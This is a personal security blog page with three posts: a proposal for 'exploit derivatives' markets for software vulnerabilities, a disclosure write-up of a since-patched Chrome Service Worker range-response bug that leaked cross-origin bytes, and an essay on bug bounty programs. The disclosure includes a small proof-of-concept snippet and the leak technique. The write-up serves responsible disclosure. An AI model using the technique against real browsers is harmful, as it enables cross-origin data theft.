Monday, March 28, 2016

Creating a Decentralized Security Rewards Market

Imagine a world where you, a security researcher, could make money on your open source contributions, and your expertise about the security of any software. Without the intervention of the vendor, and without having to sell vulnerabilities to shady (and not-so-shady) third-parties.

That is, on top of bug bounty programs, or 0-day gray markets, you could make money by following any disclosure policy you wish.

That's exactly what Rainer Böhme imagined over 10 years ago, on what he called "Exploit Derivatives", which is what I want to raise attention to, today.

Hopefully, by the end of this post you'll be convinced that such a market would be good for the internet and can be made possible with today's technology and infrastructure, either officially (backed by financial institutions), or unofficially (backed by cryptocurrencies).

The advantages to software users

First of all, let me explain where the money would come from, and why.
Imagine Carlos, a Webmaster and SysAdmin for about 100 small businesses (dentists, restaurants, pet stores, and so on) in Argentina. Most of Carlos' clients just need email and a simple Wordpress installation. 
Now, Carlos' business grew slowly but consistently, since more and more business wanted to go online, and word of Carlos' exceptional customer service spread. But as his client pool grew, the time he had to spend doing maintenance increased significantly. Since each client had a slightly customized installation for one reason or another, breakage happened every time there was an upgrade scheduled, and attacks from DoS to simple malware looking for SQL injection bugs made Carlos capable to spend less and less time onboarding new customers.
Users that depend on the security of a given piece of software would fund security research and development indirectly. They would do this by taking part on an open market to protect (or "hedge") their risk against a security vulnerability on the software they depend on.

The way they would do this "hedge" is by participating on a bet. Users would bet that the software they use will have a bug. Essentially, they would be betting against their own interests. This might sound strange, but it's not. Let me give you an example.

Imagine that you went to a pub to watch a soccer game of your favorite team against some obscure small new team. There's a 90% chance your favorite team will win, but if your team happened to lose, you would feel awful (nobody wants to lose against the small new team). You don't want to feel awful, so you bet against your own team (that is, you bet that your favorite team will lose) to the guy sitting next to you. Since the odds are 9:1 in favor of your favorite team, you would have to pay 1 USD to get 10 USD back (making a 9 USD profit), which you can use to buy a pint of beer for you and your friend.

This way, in the likely case your favorite team wins, you forfeit 1 USD, but feel great, because your team won! And in the unlikely case your favorite team loses, you get 10 USD and buy a pint of beer for you and your friend. While in reality, loyalty in your team might prevent this situation from happening for most soccer fans, there's nothing stopping you to "bet" against your interests to do some damage control, and that's what is called "hedging" in finance.

This "hedge" could be used by Carlos in our example by betting that there will be a vulnerability in case he has to do an out-of-schedule upgrade on all his clients. If it doesn't happen, then good! He loses the bet, but doesn't have to do an upgrade. If he wins the bet, then he would get some money.

Companies usually do this because it reduces their volatility (eg, the quarter-to-quarter differences in returns), which makes them more stable, which in turn makes them more predictable, which means they become more valuable as a company.

Bug hunters joining the financial market

OK, this must sound like a ridiculous idea, and I must admit I worded it like this to make it sound crazy, but hang on with me for a second. Bug hunters are the ones with the most to win on this market, and I'll explain why.

Today's security researchers have a couple ways to earn money off their expertise:
  1. By contracting their expertise through a pentesting firm to software vendors, and users.
  2. By reporting bugs to the vendor, who might issue a reward in return (commonly called bug bounty programs).
  3. By reporting bugs in any way or form, and getting paid by interested parties (such as the internet bug bounty).
  4. And to a lesser extent, by hardening code, and claiming bounties for patches to OSS software (via open source bounties, or patch reward programs).
Böhme's proposal is to add a new source of revenue for bug hunters, as an financial instrument, that has the following properties:
  • A one-time effort continues to yield returns in the long term
  • Not finding bugs is also profitable (almost as much as finding them)
  • Vulnerability price is driven by software security and popularity
  • Provides an incentive to harden software to be more secure
These reasons make this market extremely attractive for bug hunters, specially for those able to find hard to find bugs, as explained below.

Introducing exploit derivatives

The idea is simple. Allow bug hunters to trade with each other on their confidence on the security of a given piece of software, and allow users to hedge their risk on such market.
Mallory reviews some piece of software used by Carlos, say a Wordpress Vimeo plugin. Mallory thinks that while it's very badly written, there are no vulnerabilities in the code as currently written (say, out of luck or simply because of old exploitable bugs being fixed as they were found). As a result, Mallory "bets" that there won't be a bug in the Wordpress Vimeo plugin within the next year, and is willing to bet 100 USD that there won't be a bug to anyone willing to give her 10 USD. If there's a bug, Mallory has to pay 100 USD, but if there isn't one, Mallory gets 10 USD. In other words, Mallory would get a 10% ROI (return of investment).
Carlos, as we explained above, has over a hundred customers, and deploying an update to all his customers would cost him at least one extra hour of work (in average). So, Carlos decides to take Mallory on the bet. If he loses the bet, no problem, he lost 10 USD, but if he wins, he wins some money for spending an hour on maintenance.
By allowing users to trade "bets" (or as they are called in finance binary options) with bug hunters, the market satisfies the needs of both sides (the user "hedges" his risk to the market, and the bug hunter earns money). If there happens to be a bug, Mallory has to pay, sure, and she might lose money, but in average Mallory would earn more money, since she is the one setting her minimum price.

Trading contracts with other bug hunters

Fig. 1 from Böhme 2006 [*]
An important aspect of this market is the ability for contracts to be traded with other bug hunters. That is because, over time the understanding of a given piece of code might change, as other bug hunters would have more time to review large code bases further and with more scrutiny.

As a result, it's important to be able to allow contracts to be exchanged and traded for a higher (if confidence in the software increased) or lower (if confidence in the software decreased) value.
Eve, on the other side of the world, did a penetration test of the Wordpress Vimeo plugin. Eve reaches a similar conclusion to Mallory, however Eve is a lot more confident on the security of the plugin. She actually had found many bugs in the plugin in the past, and all of them were patched by Eve herself, as a result, she is very confident on it's security, and offers a similar bet to Mallory's, but a bit cheaper. She is willing to bet 100 USD that there won't be a bug to anyone willing to give her 5 USD! 
At this point, Mallory can make money by simply buying this bet from Eve, unless Mallory is extremely confident there will not be a bug in the plugin. This is because if Mallory buys the bet, she will get 5 USD back no matter what happens. For example: if there is a bug, and Mallory loses the bet, she will get 100 USD from Eve, and then Mallory would give the 100 USD to Carlos. If there is no bug, then Mallory just made a 5 USD profit. This is what is known in finance as an "arbitrage opportunity".
And obviously, this allows for speculators (people that buy and sell these contracts looking to make a profit, but aren't users nor bug hunters) and market makers to join the market. Speculators and market makers provide an important service, which is that they provide "liquidity" because they would provide more "supply" of contracts than those available by just users or bug hunters (liquidity is a financial term that means it's very easy to buy and sell things on a market).

Market makers - what? who? why?

The "market makers" are people that buy or sell financial instruments in bulk at a guaranteed price. They are essential to the market, not just because they make buying and selling contracts easier, but also because they make the price a lot more stable and predictable. Usually, the market makers are the ones that end up profiting the most off the market (but they also face a lot of risks in the process).

However, in the exploit derivatives market, profit isn't the only incentive to become a market maker. Ultimately, what the market price will define will be the probability of an exploit being published before a given date. The market makers can make the exchange of a specific type of exploit derivative a lot more accessible to participants (for both, bug hunters and users), making this predictions a lot more accurate.

To give an example, imagine a market maker buys 1,000 options for "there will be a bug", and 1,000 options for "there won't be a bug" (with the same example of Carlos, Eve and Mallory). Without the market maker, Carlos would have to find Eve and Eve would have to find Mallory, which might be difficult. On the other hand, if a market maker exists, then they just need to know of the market maker at the exchange and buy/sell to it.

As long as the market makers sell as many options for each side, the risk would be minimized. The market maker would then purchase as many options as it needs to balance it's risk, or rise the price as needed (for instance, if everyone wants to buy "there will be a bug", then it has to increase it's price accordingly).

And in case it wasn't obvious by now, the more "liquidity" on the market, then the more accurate the prices become. And the more accurate they become, the more value there is in exploit derivatives as a "prediction" market. Note that another service provided by this is the decentralized aggregated knowledge of the security community to predict whether a vulnerability exists or not, and that provides value to the community in and of itself[*].

What happens if there's a bug?

When someone finds a bug, then the finder can make a lot of money! And that's the whole point of this blog post. This creates a strong financial incentive to do security research and make money off it in a more distributed manner that is compatible with existing vulnerability reward programs.

The way this would work is, when you find a bug, you just buy as many "bets" for "there will be a bug" as you can, and you just report it to the vendor, or post it to full disclosure.. whatever works for you. This will essentially guarantee you will win the bet, and make a profit.

What's most interesting about this, is that the profit you can make is defined by the market itself, not the vendor. This means that the software that the market believes to be most secure, as well as the most popular software would yield the most money. And this actually incentivizes bug hunters to look at the most important pieces of infrastructure for the internet at any given point in time.

This also is likely to provide a higher price for bugs than existing security reward programs, and since they aren't incompatible (as currently defined), there isn't a concern on getting both a reward and returns from the market.

Note this is actually the same as when you don't find a bug, except that not finding a bug yields profits from those trying to limit the risk of the existence of a vulnerability, and finding one yields profits from those that didn't find the bug.

Funding hardening and secure development

One of the best things from this market, is that it would create a financial incentive to write secure software, and harden/patch existing software, which is something that our industry hasn't done a particularly great job at.

There are two ways to fund secure development with exploit derivatives:
  • By bug hunters that have a long bet on the security of a product, and protecting their liability
  • By donations to software vendors contingent on having no vulnerabilities for some time
Let me explain. If a bug hunter has a one-year bet that there won't be a new bug, unless the project has very little development, and has a history of being very secure, the bug hunter has a strong incentive to make sure new bugs are hard to introduce. This bug hunter could do it by refactoring APIs to be inherently secure, and improve test coverage, and the project's overall engineering practices.

The other way it funds secure development is by making donations contingent on the absence of vulnerabilities. It would be possible to make a donation, of say 50 USD to an open source project, and give an extra 50 USD only if there are no vulnerabilities for a year (and if there are, the user can get his money back).

Who decides what's a valid bug?

Who would be the decider for what is and isn't a bug? At the end, these people would have a lot of power on such a market. And per my experience on the vendor side of vulnerability reward programs, what is and isn't a bug, is often difficult to decide objectively.

To compensate for such risk, as with any financial decision, one must "diversify" - in this case, diversify, means choose as many "referees" (or "bug deciders") as possible.

On today's day and age CERTs provide such service, as well as vendors (through security advisories). As a result, one can make a bet based on those pieces of information (eg. CVSSv3 score above 7.0 or bounty above $3,000). However, these might not always mean what the user wants to represent, and for those cases it would be better to create an incentive for market-specific deciders to make decisions.

One way to solve this problem, as pointed out by Böhme is to make the conditions as clear as possible (which could make arbitration very cheap). One could imagine a VM or a docker image  that is preconfigured and includes some "flags", that if, under a specific attack scenario (eg, same network, remote attacker, minimal user interaction) might result in compromise of a "flag". This is akin to CTF competition, and would be quite obvious in the majority of cases.

For more complex vulnerabilities or exploits, one might want human judgment to decide on the validity of an exploit. For example, the recent CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow has specific requirements that are clearly exploitable for most users, but might seem ridiculous to others. Having a trusted referee with sufficient expertise to decide and have a final say would go a long way to create a stable market.

And this actually creates another profit opportunity to widely known, and trusted bug hunters. If the referees get a fee for their services, they can make a profit simply for deciding whether a piece of software has a known valid vulnerability or not. The most cold-headed impartial referees would eventually earn higher fees based on their reputation on the community.

That said, human-based decisions would introduce ambiguity, and the more judgment you give the referees, the more expensive they become (essentially to remove the incentive of being bribed). While reputation might be something to prevent misbehavior by referees, in the long term, it would be better for the market (and a lot cheaper) to use CTF-style decisions, rather than depending on someone's judgment.

Vulnerability insurance and exploit derivatives

It's worth noting that while exploit derivatives look similar to insurance, they are quite different. Some important differences from insurance are:
  • For insurance you would usually only get the money you can demonstrate a loss for. In this case, money changes hands even when there is no loss! In other words, if a user buys an insurance to cover losses for getting hacked, they will get all costs covered up to a specific amount. But in hedging, even if there is no loss you anyway get the money (this essentially makes hedging a lot more expensive than insurance).
  • Another important difference is that insurers won't write an insurance policy to anyone, while anyone can trade a binary option as long as they have the funds to do so. This is because your personal risk of loss is irrelevant to the market. When you are trading options your identity is irrelevant.
That said, one could easily build an insurance contract on top of exploit derivatives. Insurance would reduce the price of the policy by only paying for actual demonstrable losses, and would fluctuate the price of the policy depending on the risk each policy holder bears.

Note, however, that this is not the only way to do it, there is a lot of research on the subject of hedging risks with "information security financial instruments" lead by Pankaj Pandey and Einar Arthur Snekkenes, whom explain how several different incentives and markets can be built for this purpose[1][2][3][4].

Incentives, ethics and law

Exploit derivatives, might create new incentives, some that might look eerie, mostly related to different types of market manipulation:
  • Preventing vulnerability disclosure
  • Transfer risk from vendors to the community
  • Spreading lies and rumors
  • Legality and insider trading
  • Introducing vulnerabilities on purpose
I think it's interesting to discuss them, mostly because while some raise valid concerns, some others seem to be just misunderstandings, which we might be able to clarify. Think of this as a threat model.

Preventing vulnerability disclosure

An interesting incentive that Micah Schwalb pointed out in his paper from 2007 on the subject ("Exploit derivatives and national security"), is that software vendors in the United States might have several resources at their disposal to prevent the public disclosure of security vulnerabilities. In specific, he pointed out how several laws (DMCA, Trade Secrets, and Critical Infrastructure statutes) have been used, or could be used by the vendors to keep vulnerabilities secret for ever.

It's clear that if vulnerabilities are never made public, it's very difficult to create a market like Exploit Derivatives, and that was the main argument Schwalb presented. However, we live in a different world now, where public disclosure of vulnerabilities is not only tolerated by software vendors, but celebrated and remunerated via vulnerability reward programs.

The concerns that Schwalb presented would still be valid for vendors that attempt to silence security research, however, fortunately for customers, a lot of vendors take a more open and transparent approach where public discussion of (fixed) vulnerabilities is supported by our industry.

Transfer risk from vendors to the community

One interesting consequence of a market like this, as pointed out by David, is that this market would transfer the financial risk of having a security vulnerability away from the software vendor, and push it towards the security community. That is because if the vendor is not involved, then the vendor can't lose any money for writing insecure software in the market.

However, the most important aspect to notice here, is that the vendor is part of the market in a way, even if it doesn't want to be, and that is because the vendor is the only one that can make the software better (for non-free software). If the software "security" trades for a very low price, then there's a clear financial incentive for the vendor to improve it's security (for example, if some given software has a demand of bets that pay 9:1 that there will be a bug, the vendor can earn 10x it's investment if it can make it so that there are no bugs anymore). So yes, the vendor doesn't have to absorb any risk on having a vulnerability, but it instead gets an incentive to improve the software.

Eventually, the vendor would stop investing in security as soon as the market stops demanding it, leading to software that is as secure as it's users want it to be (or more, if the vendor wants to, for any other reasons).

Spreading lies and rumors

Real markets have historically been vulnerable to social engineering. In fact, there are countless examples on cases when media misunderstandings or mistranslations have caused dire consequences to the economy.

Additionally, things like ZDI's upcoming advisories list would suddenly become extremely profitable, if someone was to hack or MITM that page, at the right time. Same for "side channels" for security vulnerabilities, or embargoes of vulnerabilities in popular software.

But also, as lcamtuf pointed out, some of these channels might even come without the need of any targeted attack. Things like an early heads up from a trusted maintainer, which could be spoofed, or things like wiki pages used to make security announcements, if anyone can edit them, they could easily be used to manipulate the market.

If any, the media tends to exaggerate news stories. A small vulnerability is always amplified a hundred times by the media, which could cause chaos in the market. At this point, referees wouldn't even have to be involved, and trading would just be based on speculation.

But this is a perfect arbitrage opportunity, for those that get a chance to notice it. In this case, one could check the headers of the email, or could double check the statement with the maintainer, or just see who made the update to the wiki. If something looks fishy, then an speculator would be able to capitalize on the market uncertainty and balance the price back to normal. This is essentially how the free market deals with this risk on other markets.

Finally, this would incentivize software maintainers to improve their security patch release coordination. Perhaps it would make CERT more popular, or at least it would create an incentive for CERT to act as a trusted third party for the release and scoring of software vulnerabilities, which would also end up being good for the market.

Insider trading and vulnerabilities

If you thought of insider trading when reading about creating a vulnerability market, then you are not alone. But insider trading is a commonly misunderstood concept, and exploit derivatives doesn't exactly apply for most freelance bug hunters (although, it might apply to developers and employees of some companies). Let me explain.

Insider trading is essentially when someone with a "fiduciary duty" (will explain below) with access to non-public information makes a trade in the market. You might think that this means that if someone finds a bug, they would be committing insider trading if they "bet" that there would be a bug, but for most bug hunters this really shouldn't be the case.

First of all, for open source software, where no binary analysis nor reverse engineering is required, the bug hunter would be acting with public information (the source code) when making the trade. The fact the bug hunter was able to see a vulnerability is equivalent to a financial analyst being able to see an arbitrage opportunity in the market.

Another point is that the majority of bug hunters shouldn't have "fiduciary duty" to other market participants, so there shouldn't be a conflict of interest there. Here's the definition of fiduciary duty.
A fiduciary duty is a legal duty to act solely in another party's interests. Parties owing this duty are called fiduciaries. The individuals to whom they owe a duty are called principals. Fiduciaries may not profit from their relationship with their principals unless they have the principals' express informed consent.
https://www.law.cornell.edu/wex/fiduciary_duty
Employees (either developers, bug hunters or else) of companies that use the software, however, might be restricted from engaging in such trades, depending on how they got the information, and when[*]. For a final say on the subject, participants would have to get advice from a lawyer with experience in "Securities and Corporate Law".

Note, however, that insider trading wouldn't necessarily be bad for this market [1][2], and this wouldn't even be something one would need to think about until a market like this is regulated (if it is regulated at all), but either way, that's a discussion better to be left between economists and lawyers, not security researchers :)

On the other hand, looking at the benefits of having companies participate in this market:
  • Employers could give exploit derivatives as compensation to employees in bundles that pay if there are no public exploits, as a way to incentivize security, which would be good for both, the users and the market. Equity is already a big part of the compensation for most companies, specially startups, so adding a new instrument as compensation would provide a more concrete mechanism for developers to influence it's value (by writing more secure software).
  • Victims of 0-day vulnerabilities would have a financial incentive to try and recover the exploit used to attack them (via forensics, reverse engineering or else), as today there's very little incentive for victims to speak out and share technical details. This could of course be done anonymously, as the community would only care about the technical details, and less so of the identity of the victim.

Introducing vulnerabilities on purpose

The most dangerous incentive that a market like this could create is that of introducing vulnerabilities on purpose. Fraud like this is also a danger to the trustworthiness of the market, and because of the distributed nature of open source software, it would be very hard for someone to even try to bring civil or criminal charges to someone that did this. However, this should be addressed by the market in two ways:
  • Price - Software that accepts third-party contributions and has little oversight over them, or with a large development team that might not be as trustworthy would yield low returns for backdoors or bugs introduced on purpose. And while introducing a vulnerability without being noticed is definitely possible, software with strict engineering practices and stringent code reviews processes would end up being the highest valued in the market.
  • Competition - Participants in the market with long-term investments on the security of software will compete with those trying to introduce bugs. Practically, the stakes are the same on both sides, so it would be as easy to make money by making software safer than the opposite (without the risk it incurs by introducing bugs on purpose).
Finally, these could also be mitigated by donations that pay maintainers only if there are no vulnerabilities. Contracts would be structured in ways to limit the risk (say, by requiring code to be in the code base for a long time) and make this avenue less profitable than making the software more secure.

At the end, we would end up incentivizing open source software maintainers to be more careful with the patches they accept, and employ safer engineering practices for the project. We would also create more oversight by interested third parties, and hopefully, by way of it, make software safer as a result.

Conclusions

If you've reached so far down the blog post, you might either be as excited about this as I am, or yu are waiting for me to pitch you my new startup! Well, fear not.. There is no startup, but I am most definitely ready to abuse your enthusiasm and encourage you to help make this a reality! Either by sharing your thoughts, sharing this to your friends or reviewing it's design.

Exploit derivatives was a bit popular a few years after it was published, but it didn't get wide enough attention in the security community (although in 2011, projects like BeeWise and Consensus Point briefly experimented with it).

It seems, that in 2006 our industry had little experience on vulnerability markets, and in 2011 it was too complex and expensive to setup a prediction market, which probably made the upfront cost to setup this market extremely high. But fast-forward to 2016, when prediction markets for many fields abound[1][2][3] for varied topics such as politics, economics, or entertainment. And when creating decentralized markets with cryptocurrency is not only possible and accessible, but also being very heavily invested by the security and open source community already (although, surprisingly, not for software security!).

I think experimenting on this market using a cryptocurrency would allow us to very quickly test the idea. For example, we could use Augur[despite it's controversy], a recently launched project (currently in Beta, so no money is being exchanged yet), that creates a decentralized prediction market which can be used for exploit derivatives among other things (and most importantly, has an API that could be used to build a security vulnerability prediction market on top of it).

Anyway, to finalize this blog post, I have one last request. If you are interested to discuss about exploit derivatives I just created a mailing list to talk about it here:
There's nothing on it yet, but I would love to hear your feedback! Positive and negative. Specially if you or someone you know has experience on security research, financial markets or security economics.

I would be particularly interested to hear from you if you think this might have other positive or negative incentives in the security or open-source community.

Thank you for reading, and thanks to Rainer, Pankaj, Michal, David, Miki, Dionysis and Mario for their comments.

Note that this is a personal blog. What I say in this blog does not imply in any form an endorsement from my employer, nor necessarily reflects my employer's views or opinions on the subject.

Sunday, October 04, 2015

Range Responses: Mix, Match & Leak

Hey!

The videos from AppSec 2015 are now online, and the Service Workers talk is too. Anyway, this post is about another of the slides in the presentation about Range Requests / Responses (or.. more commonly known as Byte Serving) and Service Workers.

As things go, turns out you can read content cross-domain with this attack, and this post explains how that works. Range Responses are essentially normal HTTP responses that only contain a subset of the body. It works like this:

It's relatively straight forward! With service workers in the mix, you can do similar things:

And, I mean, what happens there is that the Service Worker intercepts the first request and gives you LoL instead of Foo. Note that this works cross-origin since Service Workers apply to the page that created the request (so, say, if evil.com embeds a video from apple.com, the service worker from evil.com will be able to intercept the request to apple.com). One thing to note about this, is that the Service Worker actually controls the total length of the response. What this means, is that even if the actual response is 2MB if the Service Worker says it's 100KB, the browser will believe the Service Worker (it seems browsers respect the first response size they see, in this case, the one from the service worker).

This all started when I noticed is that you could split a response in two, one generated by a Service Worker and one that isn't. To clarify, the code below, intercepts a request to a song. What's interesting about it, is that it actually serves part of the response from the Service Worker (the first 3 bytes).

Another interesting aspect, is that the size of the file is truncated to 5,000 bytes. This is because the browser remembers the first provided length.

The code for this (before the bug was patched by Chrome) was:
  // Basic truncation example
  if (url.pathname == '/wikipedia/ru/c/c6/Glorious.ogg') {
    if (e.request.headers.get('range') == 'bytes=0-') {
      console.log('responding with fake response');
      e.respondWith(
        new Response(
          'Ogg', {status: 206, headers: {'content-range': 'bytes 0-3/5000'}}))
    } else {
      console.log('ignoring request');
    }
    return;
  }
So, to reiterate, the request is responding with "Ogg" as the first three bytes, and truncating the response to 5,000 bytes. Alright, so what can you do with this? Essentially, you can partially control audio/video responses, but it's unlikely this can cause a lot of problems, right? I mean, so what you can make a bad song last 1 second rather than 30 seconds?.

To exploit this we need to take a step back and see the data as the video decoder sees it. In essence, the video decoder doesn't actually know anything about range responses, it just sees a stream of bytes. Imagine if the video that the decoder sees had the following format:

  • [Bytes 0-100] Video Header
  • [Bytes 101-200] Video Frame
  • [Bytes 201-202] Checksum of Video Frame
But the content in ORANGE comes from the Service Worker, and the content in RED comes from the target/victim site. A clever attacker would send 65 thousand different video frames until one of them doesn't error out, and then we would know what is the value of the bytes 201 and 202 of the target/victim site.

I searched for a while for a video format or container with this property, but unfortunately didn't find one. To be honest, I didn't look too hard as it's really confusing to read these specs but essentially after like 1 hour of searching and scratching my head I gave up, and decided to do some fuzzing instead.

The fuzzing was essentially like this:
  1. Get a sample of video and audio files.
  2. Load them in audio/video tags.
  3. Listen to all events.
  4. Fetch the video from length 0-X, and claim a length of X+1.
  5. Have the last byte be 0xFF.
  6. Repeat
And whenever it found a difference between the response on 0-X and 0-X+1, that means there's an info leak! I did this and in a few hours and after wasting my time looking at MP3 files (it seems they just give out approximate duration at random) I found a candidate. Turns out it wasn't a checksum, it was something even better! :)

So, I found that a specific Encrypted WebM video errors out when truncated to 306 bytes if the last byte is greater than 0x29, but triggers an onencrypted event when it's less than that. This seems super weird, but that's a good start, I guess. I created a proof of concept, where I tested whether the byte in a cross-origin resource is less than 0x29 or not. If you have a vulnerable browser (Chrome <=44) you can see this proof of concept here:
If you compare both pages you will see that one says PASS and the other says FAIL. The reason is because in the position 306 of the robots.txt of www.bing.com there is a new line, while in the position 306 of www.yahoo.com there is a letter.

Good enough you might think! I can now know whether position 306 is a space or not. Not really very serious, but serious enough to be cool, right? No. Of course not.

First of all, I wanted to know how to make this apply to any offset, not just 306. It was easy enough to just create another EBML object of arbitrary size. Then that's about it! You just make the size longer and longer. So first problem solved. Now you can change the byte offset you are testing.

But still, the only thing I can know is whether the character at that position is a space or not. So, I started looking into why that errored out, and turns out it was because the dimensions of the video were too big. There is a limit on the pixel size of a video because of some reason, and the byte in position 306 happened to be the video height dimensions that was longer than it was valid.

So, well.. now that we know that, can we learn the exact value? What if we tried to load the video 256 times, each time with a different width value, for which it would overflow if the size is too big. The formula the video decoder was using for calculating the maximum dimensions is:


So! Seems easy enough then. I get the minimum value on which it errors out, and calculate it's complement to INT_MAX/8 (minus 128), and that's the value of the byte at that position. Since this is a "less than" comparison you can solve this minimum value with a simple binary search.

And that's it. I made a slightly nicer exploit here, although the code is quite unreadable. The PoC will try to steal byte by byte of the robots.txt of www.bing.com.

Severity-wise fortunately, this isn't an end-of-the-world situation. Range Responses (or.. Byte Serving) don't actually work on any dynamically generated content I found online. This is most likely because dynamic generated content isn't static, so requesting it in chunks doesn't make sense.

And that's it for today! It's worth noting that it's possible this isn't specific with Service Workers as it seems that HTTP redirects have a similar effect (you make two requests to a same-origin video, the first time you respond with a truncated video, the second time you redirect to another domain).

Specially since Service Workers aren't as widely supported yet. Feel free to write a PoC for that (you can use this for inspiration). And once the bug is public, you can follow along this bug discovery here and the spec discussion here.

The bug is fixed in Chrome, but I didn't test other browsers as thoroughly for lack of time (and this blog post is already delayed for like 3 months because of Chrome, so didn't want to embargo this further). If you do find a way to exploit this elsewhere, please let me know the results, and happy to help if you get stuck.

Have a nice day!

Tuesday, September 22, 2015

Not about the money

This applies to all posts in this blog, but just as a reminder. What I say here doesn't necessarily have to reflect the opinions of my employer. This is just my personal view on the subject.

I want to briefly discuss bug bounties, security rewards, and security research in general. Mostly because in the last five years a lot has changed, there are many new players. Some giving rewards, and some receiving them.

Background

As a brief introduction, I'll preface this by explaining why I (personally) used to (and continue to) report bugs back when there was no money involved, and then try to go from there to where we are today.

Before there were bug bounties, I (and many others) used to report bugs for free to companies, and we usually got "credit" as the highest reward, but I actually didn't do it for the credit (it was a nice prize, but that's it).

The reason I did it was because I am a user and I (selfishly) tried to make the products I used, better and safer for me. Another reason was that the challenge of finding bugs in "big" companies was like solving an unsolvable puzzle. Like the last level of a wargame that the developers thought no one could solve.

Rewards

With that said, I was super excited when companies started paying for bugs (mostly, because I had no money), but also because it felt "right". For a couple reasons but mostly because money is free for companies and it is a good way to materialize appreciation.

Rewards are a great way to say "thank you for your time and effort". It's like a gift, that just happens to come in US Dollars. Before money, T-Shirts were the equivalent, and sometimes even handwritten notes that said thank you.

It goes without saying that respect was also a big factor for me. Speedy responses, a human touch, and honest feedback always mattered a lot to me, and gave me confidence back when I was starting. Specially when I learnt something new.

Appreciation

It is my view, that we shouldn't call them "Bug Bounty Programs", I would like them to be called "Bug Hunter Appreciation Programs". I don't like the term "Bug Bounty", because bounty sounds a lot like it's money up for grabs, when the attitude is that of a gift, or a "thank you, you are awesome".

In other words, rewards are gifts, not transactions.

Rewards, in my view, are supposed to show appreciation, and they are not meant to be a price tag. There are many ways to show appreciation, and it can go from the simple "thank you!" in an email, or  in public all the way to a job offer or a contract. In fact, I got my first job this way.

For companies, I actually think that the main value reward programs provide isn't the "potential cyber-inteligence capabilities of continuous pentesting" or anything ridiculous like that, but something a lot more simple. To build and maintain a community around you, and you do that by building relationships.

Users

Think about it this way. These bug hunters are also users of the products they found bugs on, and then these users go and make these products better for everyone else. And in return, the companies "thank" these users for their help for making it better not just for them, but for everyone.

These users also, eventually, become more familiar with these products than the developers themselves, and that is without even having access to the source code. These users will know about all the quirks of the product, and will know how to use them to their advantage. These are not power users, they are a super-powered version of a user.

And reward programs were built for these users, for those that did it back when money wasn't involved. They are there as a sign of appreciation and a way to recognize the value of the research.

Recognition

The traditional way of saying "thanks" for vulnerability research has been recognition. For recognition to be valuable it doesn't necessarily have to come from the affected product or company, but rather it could come from the press, or from others in the community. Having your bug be highlighted as a Pwnie is nice, for example, even more so than a security bulletin by the affected company.

More recently, it's more common to have money be used to supplement recognition (and some companies apparently also use it to replace recognition, requiring the researcher not to talk about the bug, or talk bad about the affected company). It's quite interesting this isn't usually highlighted, but I think it's quite important. For many of us, recognition is more important than money, if any, because we depend so much on working and learning from others, that silence diminishes the value of our work.

Money

One question that I don't see asked often enough is: How to decide reward amounts?

First of all, let's consider they are gifts, not price tags. If you could come up with a gift that feels adequate as a gift for a user that is going out of they way to make (your) product better for everyone, what would it be?

It might very well be that it isn't money! Maybe it is free licenses for your product, or invitations to parties or conferences. Maybe it's just an invite to an unreleased product. Doing this at scale, though, might prove difficult.. so if you have to use money, maybe what is worth to go out one night for dinner and movies, or so. You can take that and then go from there to calculate higher rewards.

This is one of the reasons I don't really like "micro rewards" for $10 USD or so. Because while they are well-intentioned, they also convey the wrong message. I do realize they are valuable in bulk (products that give out these micro rewards usually have a lot of low hanging fruit), but rewarding individual bugs at low rewards also gives the feeling you are just being used for crowd sourcing, or as a "Bulk Bounty".

In any case, I appreciate this is mostly the wrapping of the message being delivered, but I think the message matters when you are dealing with money. The difference between you being "the user" and you being "the product" changes the perception and relationship between companies and users.

Trust

Two of the most important aspects of any relationship, are trust and respect. Coming back to the point earlier about money, I really like to see how "no reward" responses are written in different companies, because they show how much of a feeling of a transaction, and how much of a feeling of appreciation there is.

Maybe somewhat counter-intuitive for some is that trust goes both ways. Trusting bug hunters makes response teams more trustworthy, and vice-versa. Accepting the possibility that you are wrong and made a mistake reporting a bug (even if the bug seems to be valid, maybe you are wrong!) and the other way around, handling a bug (even if the bug seems to be invalid, maybe it is valid!). This is particularly important when communicating disagreements.

In any case, whatever the decision was, just saying "thanks" goes a long way. Even the slightest hint of disrespect can ruin an otherwise strong relationship, specially in a medium as cold as email. What is even better is to be transparent about the rationale for the "no reward" response. This is difficult, logistically, as "no reward" decisions are the bulk of the responses sent by any program, but doing a good job here goes a long way to foster trust.

Help

At the end of the day, a vulnerability report in a product is simply an attempt in helping the product. Such help sometimes is not welcome by some ("best bug is unknown bug") and some times it's not helpful at all (invalid reports, for example), but in any case, it's help. Accepting help when you need it, saying thanks when you don't, and then helping back when you can is essentially team work.

Another aspect is that sometimes you can reciprocate a vulnerability report with help. If a bug hunter seems lost or started off the wrong way, a little nudging and education can go a very long way. In fact, this is one of the most amazing realizations I've had in these past 4 years. The most insistent researchers that send the most reports, are also the most enthusiastic and eager to learn.

Investing some time helping via coaching and education rather than just depending on automated advice or scoring and rankings helps to create and grow a community. These bug hunters want to help, why don't you help them? It needs time and patience, but it will be worth it. Some small amount of personal feedback is all that is needed. You can't automate relationships.

Challenges

Finally, something amazing happened. Some Bug Hunters started getting a reasonable amount of money out of this! While these programs were originally created to be more like winning the lottery, some very talented individuals actually became really good at this.

The consequences are actually quite interesting. If you can have a sustainable life off white hat vulnerability research, you also become more dependent on these relationships than ever, and trust becomes a critical aspect for sustaining this relationship in the long term. Transparency and clarity on decisions and consistency suddenly become not just best practices but guiding principles.

Another interesting challenge is that of long term planning. It might make you more efficient at finding bugs to do so every day, but companies really want to eventually make finding these bugs harder and harder. This also creates some uncertainty about your future, and how to sustain this for a long time.

Then there are other challenges. These programs are quite unique and explaining them can be challenging for their legal and fiscal implications. I still remember when I got my first reward from Mozilla it was a bit awkward explaining to my bank why I had money being sent from abroad. I can just imagine having to do this every couple weeks, would be crazy.

Conclusions

It's not about the money. It is about working together and keeping us all safe.
  • If you feel your reward wasn't as high as you expected, maybe your bug's impact wasn't understood correctly, and that also might mean it was fixed incorrectly. Make sure there are no misunderstandings.
  • If there are no misunderstandings, then take the reward as what it is - a gift. It's not a bill for your time, it's not a price for your silence, it's not a bid for your bug's market price. It's just a thank you.
  • If you don't get credit for the bug you found, but you think it is a cool bug, then get credit for yourself! Blog about it, and share it with your peers. Make sure the bug is fixed (or at least give a heads up before making it public, if it's not gonna be fixed quickly).
Bug hunters are also users. Delight them with excellent customer service. Money is just a way to say thank you, it isn't an excuse to have them do work.
